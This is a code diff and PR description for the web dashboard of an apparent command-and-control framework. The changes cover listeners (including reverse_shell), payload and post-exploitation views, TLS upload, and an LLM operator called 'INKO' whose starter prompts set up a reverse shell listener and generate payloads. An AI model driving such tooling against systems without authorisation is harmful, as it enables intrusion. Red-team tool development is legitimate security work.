@@ -113,19 +113,19 @@
 
   /** OpenAI-compatible providers (chat/completions + /models) */
   const LLM_PROVIDERS = [
-    { id: "xai", label: "xAI (Grok)", base: "https://api.x.ai/v1", model: "grok-3", needKey: true },
-    { id: "openai", label: "OpenAI", base: "https://api.openai.com/v1", model: "gpt-4o-mini", needKey: true },
-    { id: "groq", label: "Groq", base: "https://api.groq.com/openai/v1", model: "llama-3.3-70b-versatile", needKey: true },
-    { id: "openrouter", label: "OpenRouter", base: "https://openrouter.ai/api/v1", model: "openai/gpt-4o-mini", needKey: true },
-    { id: "together", label: "Together AI", base: "https://api.together.xyz/v1", model: "meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo", needKey: true },
-    { id: "deepseek", label: "DeepSeek", base: "https://api.deepseek.com/v1", model: "deepseek-chat", needKey: true },
-    { id: "mistral", label: "Mistral", base: "https://api.mistral.ai/v1", model: "mistral-small-latest", needKey: true },
-    { id: "fireworks", label: "Fireworks", base: "https://api.fireworks.ai/inference/v1", model: "accounts/fireworks/models/llama-v3p1-8b-instruct", needKey: true },
-    { id: "perplexity", label: "Perplexity", base: "https://api.perplexity.ai", model: "sonar", needKey: true },
-    { id: "gemini", label: "Google Gemini (OpenAI compat)", base: "https://generativelanguage.googleapis.com/v1beta/openai", model: "gemini-2.0-flash", needKey: true },
-    { id: "ollama", label: "Ollama (localhost)", base: "http://127.0.0.1:11434/v1", model: "llama3.2", needKey: false },
-    { id: "lmstudio", label: "LM Studio (localhost)", base: "http://127.0.0.1:1234/v1", model: "local-model", needKey: false },
-    { id: "custom", label: "Custom OpenAI-compatible", base: "", model: "", needKey: true },
+    { id: "xai", label: "xAI (Grok)", base: "https://api.x.ai/v1", model: "grok-3", needKey: true, keyUrl: "https://console.x.ai/" },
+    { id: "openai", label: "OpenAI", base: "https://api.openai.com/v1", model: "gpt-4o-mini", needKey: true, keyUrl: "https://platform.openai.com/api-keys" },
+    { id: "groq", label: "Groq", base: "https://api.groq.com/openai/v1", model: "llama-3.3-70b-versatile", needKey: true, keyUrl: "https://console.groq.com/keys" },
+    { id: "openrouter", label: "OpenRouter", base: "https://openrouter.ai/api/v1", model: "openai/gpt-4o-mini", needKey: true, keyUrl: "https://openrouter.ai/keys" },
+    { id: "together", label: "Together AI", base: "https://api.together.xyz/v1", model: "meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo", needKey: true, keyUrl: "https://api.together.xyz/settings/api-keys" },
+    { id: "deepseek", label: "DeepSeek", base: "https://api.deepseek.com/v1", model: "deepseek-chat", needKey: true, keyUrl: "https://platform.deepseek.com/api_keys" },
+    { id: "mistral", label: "Mistral", base: "https://api.mistral.ai/v1", model: "mistral-small-latest", needKey: true, keyUrl: "https://console.mistral.ai/api-keys/" },
+    { id: "fireworks", label: "Fireworks", base: "https://api.fireworks.ai/inference/v1", model: "accounts/fireworks/models/llama-v3p1-8b-instruct", needKey: true, keyUrl: "https://fireworks.ai/account/api-keys" },
+    { id: "perplexity", label: "Perplexity", base: "https://api.perplexity.ai", model: "sonar", needKey: true, keyUrl: "https://www.perplexity.ai/settings/api" },
+    { id: "gemini", label: "Google Gemini (OpenAI compat)", base: "https://generativelanguage.googleapis.com/v1beta/openai", model: "gemini-2.0-flash", needKey: true, keyUrl: "https://aistudio.google.com/apikey" },
+    { id: "ollama", label: "Ollama (localhost)", base: "http://127.0.0.1:11434/v1", model: "llama3.2", needKey: false, keyUrl: "" },
+    { id: "lmstudio", label: "LM Studio (localhost)", base: "http://127.0.0.1:1234/v1", model: "local-model", needKey: false, keyUrl: "" },
+    { id: "custom", label: "Custom OpenAI-compatible", base: "", model: "", needKey: true, keyUrl: "" },
   ];
   const LLM_PROVIDER_MAP = Object.fromEntries(LLM_PROVIDERS.map((p) => [p.id, p]));
 
@@ -149,6 +149,9 @@
         </div>
         <div class="full"><label>API key</label>
           <input id="${prefix}Key" type="password" placeholder="xai-… / sk-… (never shown again)" autocomplete="off" />
+          <div class="row" style="margin-top:6px">
+            <button type="button" id="${prefix}KeyLink" title="Open provider API keys page">Get API key ↗</button>
+          </div>
         </div>
         <div class="full" id="${prefix}ModelWrap">
           <label>Model</label>
@@ -263,6 +266,15 @@
         const prov = el(prefix + "Provider").value;
         if (key || (LLM_PROVIDER_MAP[prov] || {}).needKey === false) fetchModels();
       };
+    }
+    if (el(prefix + "KeyLink")) {
+      const go = () => {
+        const id = el(prefix + "Provider")?.value || "";
+        const u = (LLM_PROVIDER_MAP[id] || {}).keyUrl;
+        if (!u) return showError("No key page for this provider — use their console");
+        window.open(u, "_blank", "noopener,noreferrer");
+      };
+      el(prefix + "KeyLink").onclick = go;
     }
     if (el(prefix + "Key")) {
       let t = null;
@@ -759,8 +771,10 @@
                   <select id="lisKind">
                     <option value="reverse_shell">reverse_shell</option>
                     <option value="http">http</option>
+                    <option value="https">https (TLS)</option>
                     <option value="tcp">tcp</option>
                     <option value="dns">dns</option>
+                    <option value="smtp">smtp</option>
                   </select>
                 </div>
                 <div class="full"><label>DNS zone (dns only)</label><input id="lisZone" placeholder="oast.example.com" /></div>
@@ -794,7 +808,10 @@
       const port = Number(el("lisPort").value);
       const kind = el("lisKind").value;
       const zone = (el("lisZone").value || "").trim();
-      if (!name || !port) throw new Error("Name and port required");
+      if (!name) throw new Error("Name required");
+      if (!Number.isInteger(port) || port < 1 || port > 65535) throw new Error("Port must be an integer 1–65535");
+      const taken = (cache.listeners || []).find((L) => Number(L.port) === port && (L.host || "0.0.0.0") === "0.0.0.0");
+      if (taken) throw new Error("Port " + port + " already used by " + (taken.name || taken.id));
       const config = kind === "dns" && zone ? { zone } : {};
       const created = await api("POST", "/api/v1/listeners", { name, port, kind, host: "0.0.0.0", config });
       await api("POST", `/api/v1/listeners/${created.id}/start`);
@@ -836,9 +853,10 @@
   }
 
   /* —— Payloads —— */
-  function renderPayloadsView() {
+  function renderPayloadsView(force) {
     const root = el("view-payloads");
     if (!root) return;
+    if (!force && viewBuilt.payloads && root.querySelector("#payTpl")) return;
     const host = (() => { try { return location.hostname || "127.0.0.1"; } catch (_) { return "127.0.0.1"; } })();
     root.innerHTML = `
       <div class="work-panel" style="min-height:360px">
@@ -867,6 +885,7 @@
         </div>
       </div>
     `;
+    viewBuilt.payloads = true;
     if (el("payGen")) el("payGen").onclick = async () => {
       try {
         const r = await api("POST", "/api/v1/payloads/generate", {
@@ -889,9 +908,10 @@
   }
 
   /* —— Post-ex —— */
-  function renderPostexView() {
+  function renderPostexView(force) {
     const root = el("view-postex");
     if (!root) return;
+    if (!force && viewBuilt.postex && root.children.length) return;
     root.innerHTML = `
       <p class="muted" style="margin:0 0 10px;font-size:0.85rem">
         Target session: <strong class="mono" id="pxSid">${esc(selectedId || "(none — pick in Sessions)")}</strong>
@@ -924,6 +944,7 @@
         </div>
       </div>
     `;
+    viewBuilt.postex = true;
     const needSid = () => {
       if (!selectedId) throw new Error("Select a session in Sessions first");
       return selectedId;
@@ -965,9 +986,10 @@
   }
 
   /* —— Collab —— */
-  function renderCollabView() {
+  function renderCollabView(force) {
     const root = el("view-collab");
     if (!root) return;
+    if (!force && viewBuilt.collab && root.children.length) return;
     root.innerHTML = `
       <div class="form-grid">
         <div class="work-panel">
@@ -1004,6 +1026,7 @@
         </div>
       </div>
     `;
+    viewBuilt.collab = true;
     const out = (id, r) => {
       const n = el(id);
       n.textContent = typeof r === "string" ? r : JSON.stringify(r, null, 2);
@@ -1060,9 +1083,10 @@
   }
 
   /* —— Observe —— */
-  function renderObserveView() {
+  function renderObserveView(force) {
     const root = el("view-observe");
     if (!root) return;
+    if (!force && viewBuilt.observe && root.children.length) return;
     root.innerHTML = `
       <div class="toolbar">
         <button type="button" class="primary" id="obMetrics">Metrics</button>
@@ -1073,6 +1097,7 @@
       </div>
       <div class="outbox empty" id="obOut" style="max-height:480px">—</div>
     `;
+    viewBuilt.observe = true;
     const out = async (path) => {
       try {
         const r = await api("GET", path);
@@ -1300,10 +1325,49 @@
 
   function rebuildAiChatDom() {
     if (el("aiChatLog")) el("aiChatLog").innerHTML = "";
+    if (!aiChatHistory.length) {
+      renderInkoStarters();
+      return;
+    }
     aiChatHistory.forEach((m) => {
       const who = m.role === "user" ? "user" : "bot";
       appendAiChat(who, m.content, m.tools || null);
     });
+  }
+
+
+  const INKO_STARTERS = [
+    { t: "Sessions", q: "List my active sessions and summarize kind, host, and verified status." },
+    { t: "Listeners", q: "List all listeners with port, kind, and running status." },
+    { t: "Setup rev shell", q: "Setup a reverse shell listener on port 4444 and start it." },
+    { t: "Events", q: "Show recent events from the live buffer." },
+    { t: "Metrics", q: "Give me a quick metrics snapshot of this teamserver." },
+    { t: "Payloads", q: "List payload templates I can generate." },
+    { t: "Audit", q: "Show the latest audit log entries." },
+    { t: "Save tip", q: "When you generate a payload, save it to the asset library with save=true so I can reuse it." },
+  ];
+
+  function renderInkoStarters() {
+    const log = el("aiChatLog");
+    if (!log) return;
+    if (aiChatHistory.length) return;
+    const wrap = document.createElement("div");
+    wrap.className = "inko-starters";
+    wrap.id = "inkoStarters";
+    INKO_STARTERS.forEach((s) => {
+      const b = document.createElement("button");
+      b.type = "button";
+      b.className = "inko-starter";
+      b.innerHTML = "<strong></strong><span></span>";
+      b.querySelector("strong").textContent = s.t;
+      b.querySelector("span").textContent = s.q;
+      b.onclick = async () => {
+        if (aiBusy) return;
+        await runAiChat(s.q);
+      };
+      wrap.appendChild(b);
+    });
+    log.appendChild(wrap);
   }
 
   function clearAiChat() {
@@ -1312,7 +1376,8 @@
     persistAiHistory();
     removeAiPending();
     if (el("aiChatLog")) el("aiChatLog").innerHTML = "";
-    showOk("Chat cleared");
+    renderInkoStarters();
+    showOk("New chat");
   }
 
   function takeInputValue(textareaId) {
@@ -1365,11 +1430,13 @@
     }
   }
 
-  function renderAiView() {
+  function renderAiView(force) {
     const root = el("view-ai");
     if (!root) return;
+    if (!force && viewBuilt.ai && root.children.length) return;
     if (!can("ai:use") && !can("admin")) {
       root.innerHTML = `<div class="empty-state"><strong>INKO locked</strong>Need <code>ai:use</code> scope.</div>`;
+      viewBuilt.ai = true;
       return;
     }
     const CAP_CARDS = [
@@ -1522,6 +1589,53 @@
       if (e.key === "Escape" && drawer.classList.contains("open")) openAiDrawer(false);
     });
     if (el("aiClearGlobal")) el("aiClearGlobal").onclick = () => clearAiChat();
+    if (el("aiNewChat")) el("aiNewChat").onclick = () => clearAiChat();
+    // Resize INKO drawer width
+    (function bindInkoResize() {
+      const handle = el("aiDrawerResize");
+      const drawer = el("aiDrawer");
+      if (!handle || !drawer || handle.dataset.bound) return;
+      handle.dataset.bound = "1";
+      try {
+        const w = parseInt(localStorage.getItem("sc5_inko_w") || "", 10);
+        if (w >= 320 && w <= Math.min(900, window.innerWidth)) {
+          document.documentElement.style.setProperty("--inko-w", w + "px");
+        }
+      } catch (_) {}
+      let active = false;
+      const start = (e) => {
+        if (window.matchMedia("(max-width: 900px)").matches) return;
+        active = true;
+        handle.classList.add("dragging");
+        e.preventDefault();
+        const move = (ev) => {
+          if (!active) return;
+          const pt = ev.touches ? ev.touches[0] : ev;
+          const w = Math.max(320, Math.min(window.innerWidth - 80, window.innerWidth - pt.clientX));
+          document.documentElement.style.setProperty("--inko-w", Math.round(w) + "px");
+        };
+        const end = () => {
+          active = false;
+          handle.classList.remove("dragging");
+          window.removeEventListener("mousemove", move);
+          window.removeEventListener("mouseup", end);
+          window.removeEventListener("touchmove", move);
+          window.removeEventListener("touchend", end);
+          try {
+            const cur = getComputedStyle(document.documentElement).getPropertyValue("--inko-w").trim();
+            const n = parseInt(cur, 10);
+            if (n) localStorage.setItem("sc5_inko_w", String(n));
+          } catch (_) {}
+        };
+        window.addEventListener("mousemove", move);
+        window.addEventListener("mouseup", end);
+        window.addEventListener("touchmove", move, { passive: false });
+        window.addEventListener("touchend", end);
+      };
+      handle.addEventListener("mousedown", start);
+      handle.addEventListener("touchstart", start, { passive: false });
+    })();
+
     const sendGlobal = async () => {
       if (aiBusy) return;
       const prompt = takeInputValue("aiPromptGlobal");
@@ -1540,9 +1654,10 @@
     }
   }
 
-  function renderAdminView() {
+  function renderAdminView(force) {
     const root = el("view-admin");
     if (!root) return;
+    if (!force && viewBuilt.admin && root.children.length) return;
     if (!can("admin") && !can("tokens:manage") && !can("policy:manage")) {
       root.innerHTML = '<div class="empty-state"><strong>Admin area</strong>Requires admin or manage scopes.</div>';
       return;
@@ -1594,13 +1709,48 @@
             </div>
           </div>
         </div>
+        <div class="work-panel">
+          <div class="wp-head">Your actor name</div>
+          <div class="wp-body">
+            <p class="muted" style="font-size:0.78rem;margin:0 0 8px">Shown in collab, audit, and the ops chrome. Renames this API token.</p>
+            <label>Actor / display name</label>
+            <input id="adActorName" placeholder="operator-1" value="${esc(state.actor || "")}" />
+            <div class="row"><button type="button" class="primary" id="adActorSave">Save name</button></div>
+          </div>
+        </div>
+        ${can("admin") ? `
+        <div class="work-panel">
+          <div class="wp-head">TLS certificates</div>
+          <div class="wp-body">
+            <p class="muted" style="font-size:0.78rem;margin:0 0 8px">Upload PEM fullchain + private key. Activate copies to server TLS material (restart required).</p>
+            <label>Label</label><input id="tlsLabel" placeholder="letsencrypt-prod" />
+            <label>Certificate PEM (fullchain)</label>
+            <textarea id="tlsCert" rows="4" placeholder="-----BEGIN CERTIFICATE-----" class="mono" style="font-size:0.72rem"></textarea>
+            <label>Private key PEM</label>
+            <textarea id="tlsKey" rows="4" placeholder="-----BEGIN PRIVATE KEY-----" class="mono" style="font-size:0.72rem"></textarea>
+            <div class="row">
+              <button type="button" class="primary" id="tlsUpload">Upload</button>
+              <button type="button" id="tlsRefresh">Refresh list</button>
+            </div>
+            <div class="outbox empty" id="tlsOut" style="max-height:240px">—</div>
+          </div>
+        </div>` : ""}
         ${(can("llm:manage") || can("admin")) ? `
         <div class="work-panel admin-llm">
           <div class="wp-head">Configure LLM (BYO)</div>
           <div class="wp-body">${llmFormHtml("adLlm")}</div>
         </div>` : ""}
+        ${(can("payloads:generate") || can("admin")) ? `
+        <div class="work-panel">
+          <div class="wp-head">Saved assets (INKO / payloads)</div>
+          <div class="wp-body">
+            <div class="row"><button type="button" id="astRefresh">List assets</button></div>
+            <div class="outbox empty" id="astOut" style="max-height:280px">—</div>
+          </div>
+        </div>` : ""}
       </div>
     `;
+    viewBuilt.admin = true;
     if (can("llm:manage") || can("admin")) {
       bindLlmForm("adLlm");
       window.__SC5_refreshLlms = async () => {
@@ -1609,6 +1759,78 @@
         fillLlmSelect(el("aiLlmPick"), llms, loadSel("sc5_ops_llm") || "");
       };
     }
+    if (el("adActorSave")) el("adActorSave").onclick = async () => {
+      try {
+        const name = (el("adActorName").value || "").trim();
+        if (!name) return showError("Name required");
+        const r = await api("PUT", "/api/v1/me", { name });
+        state.actor = r.actor || name;
+        if (el("roleBadge")) el("roleBadge").textContent = can("admin") ? "admin" : state.actor;
+        showOk("Actor name updated");
+      } catch (e) { showError(String(e.message || e)); }
+    };
+    async function loadTls() {
+      if (!el("tlsOut")) return;
+      try {
+        const r = await api("GET", "/api/v1/tls/certs");
+        const certs = r.certs || [];
+        el("tlsOut").classList.remove("empty");
+        if (!certs.length) {
+          el("tlsOut").textContent = "No uploaded certificates yet.";
+          return;
+        }
+        el("tlsOut").innerHTML = certs.map((c) => `
+          <div style="margin-bottom:8px;padding-bottom:8px;border-bottom:1px solid var(--border)">
+            <strong>${esc(c.label || c.id)}</strong> ${c.active ? '<span class="pill ok">active</span>' : ""}
+            <span class="mono muted" style="font-size:0.7rem"> ${esc(c.id)}</span>
+            <div class="row" style="margin-top:4px">
+              ${!c.active ? `<button type="button" data-tls-act="${esc(c.id)}" class="primary">Activate</button>` : ""}
+              ${!c.active ? `<button type="button" data-tls-del="${esc(c.id)}" class="danger">Delete</button>` : ""}
+            </div>
+          </div>`).join("");
+        el("tlsOut").querySelectorAll("[data-tls-act]").forEach((b) => {
+          b.onclick = async () => {
+            try {
+              const r2 = await api("POST", `/api/v1/tls/certs/${b.getAttribute("data-tls-act")}/activate`);
+              el("tlsOut").textContent = JSON.stringify(r2, null, 2);
+              showOk("Activated — restart squidc5 to serve new TLS");
+              loadTls();
+            } catch (e) { showError(String(e.message || e)); }
+          };
+        });
+        el("tlsOut").querySelectorAll("[data-tls-del]").forEach((b) => {
+          b.onclick = async () => {
+            try {
+              await api("DELETE", `/api/v1/tls/certs/${b.getAttribute("data-tls-del")}`);
+              showOk("Deleted");
+              loadTls();
+            } catch (e) { showError(String(e.message || e)); }
+          };
+        });
+      } catch (e) { showError(String(e.message || e)); }
+    }
+    if (el("tlsUpload")) el("tlsUpload").onclick = async () => {
+      try {
+        const r = await api("POST", "/api/v1/tls/certs", {
+          label: (el("tlsLabel").value || "uploaded").trim(),
+          cert_pem: el("tlsCert").value || "",
+          key_pem: el("tlsKey").value || "",
+        });
+        showOk("Certificate uploaded: " + (r.id || ""));
+        if (el("tlsCert")) el("tlsCert").value = "";
+        if (el("tlsKey")) el("tlsKey").value = "";
+        loadTls();
+      } catch (e) { showError(String(e.message || e)); }
+    };
+    if (el("tlsRefresh")) el("tlsRefresh").onclick = () => loadTls();
+    if (can("admin")) loadTls();
+    if (el("astRefresh")) el("astRefresh").onclick = async () => {
+      try {
+        const r = await api("GET", "/api/v1/assets?limit=50");
+        el("astOut").classList.remove("empty");
+        el("astOut").textContent = JSON.stringify(r.assets || r, null, 2);
+      } catch (e) { showError(String(e.message || e)); }
+    };
     function selectedScopes() {
       return Array.from(document.querySelectorAll(".ad-scope:checked")).map((c) => c.value);
     }
@@ -1647,15 +1869,16 @@
 
   /* —— View router —— */
   function renderView(name) {
+    // Soft by default — preserve form focus/values; only build once per view
     switch (name) {
-      case "sessions": renderSessionsView(true); break;
-      case "listeners": renderListenersView(true); break;
-      case "payloads": renderPayloadsView(); break;
-      case "postex": renderPostexView(); break;
-      case "collab": renderCollabView(); break;
-      case "ai": renderAiView(); break;
-      case "observe": renderObserveView(); break;
-      case "admin": renderAdminView(); break;
+      case "sessions": renderSessionsView(false); break;
+      case "listeners": renderListenersView(false); break;
+      case "payloads": renderPayloadsView(false); break;
+      case "postex": renderPostexView(false); break;
+      case "collab": renderCollabView(false); break;
+      case "ai": renderAiView(false); break;
+      case "observe": renderObserveView(false); break;
+      case "admin": renderAdminView(false); break;
       default: break;
     }
     setPageDocs(name || "dashboard");
@@ -1674,22 +1897,28 @@
   window.__SC5_onRefresh = (data) => {
     if (data.sessions) cache.sessions = data.sessions;
     if (data.listeners) cache.listeners = data.listeners;
-    // Soft update — do not wipe selection or rebuild forms
+    const ae = document.activeElement;
+    const typing = ae && (
+      ae.tagName === "INPUT" || ae.tagName === "TEXTAREA" || ae.tagName === "SELECT" || ae.isContentEditable
+    );
+    // Soft update — never rebuild forms; skip panels while user is typing
     if (currentIs("sessions")) {
       renderSessionsView(false);
-      if (el("tskList")) loadTasksPanel();
+      if (el("tskList") && !typing) loadTasksPanel();
     }
     if (currentIs("listeners")) renderListenersView(false);
-    if (el("pxSid")) el("pxSid").textContent = selectedId || "(none — pick in Sessions)";
-    // Restore row highlights without full context rebuild if possible
+    if (el("pxSid") && !typing) el("pxSid").textContent = selectedId || "(none — pick in Sessions)";
     document.querySelectorAll("tr[data-sid]").forEach((tr) => {
       tr.classList.toggle("selected", tr.getAttribute("data-sid") === selectedId);
     });
     document.querySelectorAll("tr[data-lid]").forEach((tr) => {
       tr.classList.toggle("selected", tr.getAttribute("data-lid") === selectedListenerId);
     });
-    // Only refresh context metadata if selection still valid
-    if (selectedId) renderContext(false);
+    // Context metadata only when not focused inside context form
+    if (selectedId) {
+      const inCtx = ae && el("ctxBody") && el("ctxBody").contains(ae);
+      if (!inCtx && !typing) renderContext(false);
+    }
   };
   function currentIs(name) {
     const v = el("view-" + name);

--- a/web/phone-dashboard.html
+++ b/web/phone-dashboard.html
@@ -520,7 +520,8 @@
     .ai-backdrop.show { display: block; }
     .ai-drawer {
       position: fixed; top: 0; right: 0; bottom: 0; z-index: 60;
-      width: min(440px, 100vw);
+      width: var(--inko-w, min(440px, 100vw));
+      max-width: 100vw;
       height: 100dvh; height: 100svh;
       background: var(--bg2); border-left: 1px solid var(--border2); border-radius: 0;
       display: flex; flex-direction: column;
@@ -535,10 +536,42 @@
       pointer-events: auto;
     }
     .ai-drawer.hidden { display: none !important; }
+    .ai-drawer-resize {
+      position: absolute; left: 0; top: 0; bottom: 0; width: 8px;
+      cursor: ew-resize; z-index: 2; touch-action: none;
+    }
+    .ai-drawer-resize::after {
+      content: ""; position: absolute; left: 2px; top: 50%;
+      width: 3px; height: 40px; margin-top: -20px; border-radius: 999px;
+      background: rgba(233,30,140,0.4);
+    }
+    .ai-drawer-resize:hover::after, .ai-drawer-resize.dragging::after {
+      background: rgba(244,114,182,0.9);
+    }
     .ai-drawer-head {
       display: flex; align-items: flex-start; gap: 8px; padding: 12px 12px 10px;
       border-bottom: 1px solid var(--border); font-size: 0.85rem; flex-shrink: 0;
       padding-top: calc(12px + env(safe-area-inset-top, 0px));
+    }
+    .inko-starters {
+      display: grid; grid-template-columns: 1fr 1fr; gap: 8px; padding: 4px 0 8px;
+    }
+    .inko-starter {
+      text-align: left; padding: 10px; border-radius: 10px;
+      border: 1px solid var(--border); background: rgba(233,30,140,0.08);
+      font-size: 0.75rem; line-height: 1.35; color: var(--text);
+    }
+    .inko-starter strong { display: block; color: var(--pink2); margin-bottom: 4px; font-size: 0.78rem; }
+    .inko-starter:hover { border-color: rgba(233,30,140,0.45); background: rgba(233,30,140,0.14); }
+    body.kb-open .main-body,
+    body.kb-open .ctx-body {
+      padding-bottom: calc(24px + var(--kb-inset, 0px));
+    }
+    body.kb-open .ai-drawer-foot {
+      padding-bottom: calc(12px + var(--kb-inset, 0px));
+    }
+    body.kb-open .ai-drawer-body {
+      padding-bottom: 8px;
     }
     .ai-drawer-head .inko-titles { flex: 1; min-width: 0; display: flex; flex-direction: column; gap: 2px; }
     .ai-drawer-body {
@@ -990,23 +1023,25 @@
     <!-- INKO — Intelligent Neural Kinetic Operator (top-bar flyout) -->
     <div id="aiBackdrop" class="ai-backdrop" hidden aria-hidden="true"></div>
     <aside id="aiDrawer" class="ai-drawer hidden" aria-label="INKO chat" aria-hidden="true">
+      <div class="ai-drawer-resize" id="aiDrawerResize" title="Drag to resize INKO" role="separator" aria-orientation="vertical"></div>
       <div class="ai-drawer-head">
         <div class="inko-titles">
           <strong class="inko-brand-full"><span class="inko-acronym">◈ INKO</span></strong>
           <span class="muted" style="font-size:0.72rem;font-weight:600;line-height:1.25">Intelligent Neural Kinetic Operator</span>
         </div>
+        <button type="button" id="aiNewChat" title="Start a new chat" style="flex-shrink:0">New chat</button>
         <a class="doc-link" href="https://github.com/SquidSec/SquidC5/blob/master/docs/user-guide.md#inko-intelligent-neural-kinetic-operator" target="_blank" rel="noopener noreferrer" style="font-size:0.7rem;flex-shrink:0">Docs</a>
         <button type="button" id="aiDrawerClose" style="margin-left:4px;flex-shrink:0" title="Close INKO" aria-label="Close INKO">✕</button>
       </div>
       <div class="ai-drawer-body" id="aiChatLog"></div>
-      <div class="ai-drawer-foot">
+      <div class="ai-drawer-foot" id="aiDrawerFoot">
         <select id="aiLlmGlobal" title="LLM connection"></select>
         <textarea id="aiPromptGlobal" rows="3" placeholder="Ask INKO anything - list sessions, spin up a listener…"></textarea>
         <div class="row" style="margin:0;gap:6px">
           <button type="button" class="primary" id="aiSendGlobal" style="flex:1">Send</button>
           <button type="button" id="aiClearGlobal" title="Clear chat">Clear</button>
         </div>
-        <p class="muted" style="margin:0;font-size:0.62rem">Enter to send · Shift+Enter newline</p>
+        <p class="muted" style="margin:0;font-size:0.62rem">Enter to send · Shift+Enter newline · drag left edge to resize</p>
       </div>
     </aside>
 
@@ -1049,6 +1084,8 @@
       <input id="url" type="url" placeholder="https://HOST:8443" autocomplete="off" />
       <label for="token">API token</label>
       <input id="token" type="password" placeholder="sc5_…" autocomplete="off" />
+      <label for="actorName">Actor display name (optional)</label>
+      <input id="actorName" type="text" placeholder="Leave blank to keep token name" autocomplete="nickname" />
       <label for="refresh">Poll interval (sec)</label>
       <input id="refresh" type="number" min="5" max="120" value="10" />
       <div class="row" style="margin-top:14px">
@@ -1382,6 +1419,16 @@
       if (timer) clearInterval(timer);
       timer = setInterval(() => refresh().catch(() => {}), c.refresh * 1000);
       showOk("Connected as " + state.actor);
+
+    const wantActor = ($("actorName") && $("actorName").value || "").trim();
+    if (wantActor && wantActor !== state.actor) {
+      try {
+        const ren = await api("PUT", "/api/v1/me", { name: wantActor });
+        state.actor = ren.actor || wantActor;
+        if ($("roleBadge") && !can("admin")) $("roleBadge").textContent = state.actor;
+      } catch (e) { console.warn("actor rename", e); }
+    }
+
     } catch (e) {
       $("statusBadge").textContent = "error";
       $("statusBadge").className = "pill bad";
@@ -1631,6 +1678,26 @@
   window.__SC5_setView = setView;
   window.__SC5_buildPhoneShareUrl = buildPhoneShareUrl;
 })();
-  </script>
+  
+  /* Mobile keyboard: keep focused inputs above keyboard */
+  (function () {
+    const vv = window.visualViewport;
+    if (!vv) return;
+    const apply = () => {
+      const kb = Math.max(0, Math.round(window.innerHeight - vv.height - vv.offsetTop));
+      document.documentElement.style.setProperty("--kb-inset", kb + "px");
+      document.body.classList.toggle("kb-open", kb > 60);
+      const a = document.activeElement;
+      if (kb > 60 && a && (a.tagName === "TEXTAREA" || a.tagName === "INPUT" || a.tagName === "SELECT")) {
+        try { a.scrollIntoView({ block: "center", behavior: "smooth" }); } catch (_) {}
+      }
+    };
+    vv.addEventListener("resize", apply);
+    vv.addEventListener("scroll", apply);
+    window.addEventListener("focusin", () => setTimeout(apply, 50));
+    window.addEventListener("focusout", () => setTimeout(apply, 100));
+  })();
+
+</script>
 </body>
 </html>


### PR DESCRIPTION
## Summary
- **Soft refresh**: poll/nav no longer wipe form focus or rebuild inputs; only tables/metadata update while typing
- **INKO**: drag-resize flyout width; **New chat**; empty-state starter cards; mobile keyboard inset so inputs stay visible
- **Listeners**: all kinds in dropdown including **smtp** + **https** (TLS); port 1–65535 + reject ports already in use
- **Actor name**: `PUT /api/v1/me` + Admin form + optional connect-modal rename
- **LLM**: **Get API key ↗** opens provider console
- **TLS library** (Admin): upload PEM fullchain/key, list, activate (restart to apply), delete
- **Assets**: save INKO-generated payloads/profiles/implants via API + `save_asset` tool; Admin list

## Test plan
- [x] `pytest tests/test_ops_ux_extras.py` (+ AI/security subset)
- [ ] Edit listener name during 10s poll — value sticks
- [ ] INKO empty starters + New chat + drag width
- [ ] Create https listener; smtp visible; duplicate port rejected
- [ ] Admin TLS upload/activate; LLM Get API key